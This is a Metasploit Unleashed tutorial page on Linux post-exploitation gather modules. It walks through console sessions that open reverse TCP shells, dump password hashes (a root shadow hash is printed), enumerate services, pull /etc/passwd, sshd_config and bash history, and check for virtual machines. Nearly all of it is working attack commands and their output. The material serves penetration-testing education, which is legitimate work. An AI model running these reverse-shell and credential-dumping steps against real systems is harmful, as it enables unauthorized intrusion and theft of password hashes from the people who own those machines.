Linux Post Gather Modules

From Metasploit Unleashed

1 hashdump
2 enum_services
3 enum_linux
4 checkvm

hashdump

The "hashdump" module will dump the password hashes for all users on a Linux system.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set lhost lhost 192.168.1.101
lhost => lhost 192.168.1.101
msf exploit(handler) > exploit

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf exploit(handler) > set lhost 192.168.1.101
lhost => 192.168.184.130
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.101:40126) at 2011-06-02 15:46:03 -0400

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   VERBOSE  false            no        Show list of Packages.

msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > run

[+] root:$6$f6jnFxJ7$3cOtDI64jpPqVi3F7I033BxVQqHP5MC4TAmXb.NkLa65MNaG2rbWe2te2AWwRuIA/NVVoVKoUSMYH2w0SuDYK0:0:0:root:/root:/bin/bash
…snip…
[+] Unshadowed Password File: /root/.msf3/loot/20110602154652_default_192.168.184.130_linux.hashes_130860.txt
[*] Post module execution completed
msf post(hashdump) >

enum_services

The "enum_services" module will enumerate Services on a Linux system.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.184.130
lhost => 192.168.184.130
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.184.130:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.184.130:4444 -> 192.168.184.130:45979) at 2011-06-02 16:19:00 -0400

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/enum_services
msf post(enum_services) > show options

Module options (post/linux/gather/enum_services):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   VERBOSE  false            no        Show list of Packages.

msf post(enum_services) > set session 1
session => 1
msf post(enum_services) > run

[+] Info:
[+]     BackTrack 5 - Code Name Revolution 32 bit
[+]     Linux root 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
[*] Service list saved to loot file: /root/.msf3/loot/20110602161959_default_192.168.184.130_linux.services_184278.txt
[*] Post module execution completed
msf post(enum_services) >

root@kali:~# cat /root/.msf3/loot/20110602161959_default_192.168.184.130_linux.services_184278.txt
 [ ? ]  alsa-mixer-save
 [ - ]  apache2
 [ - ]  apparmor
 [ ? ]  apport
 [ ? ]  atd
 [ ? ]  avahi-daemon
 [ ? ]  binfmt-support
 [ - ]  bootlogd
 [ ? ]  bridge-network-interface
 [ - ]  casper
 [ ? ]  console-setup
 [ ? ]  cron
 [ ? ]  cryptdisks
 [ ? ]  cryptdisks-early
 [ ? ]  cryptdisks-enable
 [ ? ]  cryptdisks-udev
 [ - ]  cups
 [ ? ]  dbus
 [ ? ]  decnet
 [ ? ]  dmesg
 [ ? ]  dns-clean
 [ ? ]  ecryptfs-utils-restore
 [ ? ]  ecryptfs-utils-save
 [ ? ]  failsafe-x
 [ - ]  fancontrol
 [ - ]  farpd
 [ ? ]  framework-postgres
 [ - ]  gpsd
 [ - ]  grub-common
 [ ? ]  gssd
 [ ? ]  hostname
 [ ? ]  hwclock
 [ ? ]  hwclock-save
 [ ? ]  idmapd
 [ ? ]  irqbalance
 [ ? ]  killprocs
 [ - ]  lm-sensors
 [ ? ]  module-init-tools
 [ ? ]  mysql
 [ ? ]  nessusd
 [ ? ]  network-interface
 [ ? ]  network-interface-security
 [ ? ]  networking
 [ ? ]  ondemand
 [ ? ]  openvpn
 [ ? ]  pcscd
 [ ? ]  plymouth
 [ ? ]  plymouth-log
 [ ? ]  plymouth-splash
 [ ? ]  plymouth-stop
 [ ? ]  portmap
 [ ? ]  portmap-boot
 [ ? ]  portmap-wait
 [ ? ]  pppd-dns
 [ ? ]  procps
 [ + ]  pulseaudio
 [ ? ]  rc.local
 [ ? ]  rinetd
 [ ? ]  rpc_pipefs
 [ - ]  rsync
 [ ? ]  rsyslog
 [ ? ]  screen-cleanup
 [ ? ]  sendsigs
 [ - ]  snort
 [ + ]  ssh
 [ ? ]  statd
 [ ? ]  statd-mounting
 [ ? ]  stop-bootlogd
 [ ? ]  stop-bootlogd-single
 [ ? ]  ubiquity
 [ ? ]  udev
 [ ? ]  udev-finish
 [ ? ]  udevmonitor
 [ ? ]  udevtrigger
 [ ? ]  ufw
 [ ? ]  umountfs
 [ ? ]  umountnfs.sh
 [ ? ]  umountroot
 [ - ]  urandom
 [ - ]  wicd
 [ - ]  winbind
 [ ? ]  wpa-ifupdown

enum_linux

The "enum_linux" module will gather basic system information from Linux systems enumerating users, hashes, services, network configs, routing tables, installed packages, screenshot, and bash_history.

msf post(enum_linux) > run

[*] Running module against bt
[*] Execute: /usr/bin/whoami
[*] Module running as root
[+] Info:
[+] 	BackTrack 5 - Code Name Revolution 32 bit 
[+] 	Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
[*] Collecting data...
[*] Execute: /bin/cat /etc/passwd | cut -d : -f 1
[*] Execute: /sbin/ifconfig -a
[*] Execute: /sbin/route
[*] Execute: /bin/mount -l
[*] Execute: /sbin/iptables -L
[*] Execute: /sbin/iptables -L -t nat
[*] Execute: /sbin/iptables -L -t mangle
[*] Download: /etc/resolv.conf
[*] Download: /etc/ssh/sshd_config
[*] Download: /etc/hosts
[*] Download: /etc/passwd
...snip...
[*] Post module execution completed

checkvm

The "checkvm" module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.184.129
lhost => 192.168.184.129
msf exploit(handler) > show options
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.184.129:4444 
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.184.129
[*] Command shell session 1 opened (192.168.184.129:4444 -> 192.168.184.129:52156) at 2011-06-20 12:37:55 -0400

^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/checkvm
msf post(checkvm) > show options

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(checkvm) > set session 1
session => 1
msf post(checkvm) > run

[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
[*] Post module execution completed
msf post(checkvm) >

Module Reference > Post Modules > Windows Post Modules > Linux Post Gather Modules

Retrieved from "http://www.offensive-security.com/w/index.php?title=Linux_Post_Gather_Modules&oldid=1552"

Category:

Windows Post Modules

Metasploit Unleashed

Linux Post Gather Modules

Contents

hashdump

enum_services

enum_linux

checkvm

Introduction

Required Materials

Metasploit Fundamentals

Information Gathering

Vulnerability Scanning

Writing a Simple Fuzzer

Exploit Development

Client-side Exploits

Client Side Attacks

MSF Post Exploitation

Meterpreter Scripting

Maintaining Access

MSF Extended Usage

Metasploit GUIs

About the Authors

Post Module Reference

Auxiliary Module Reference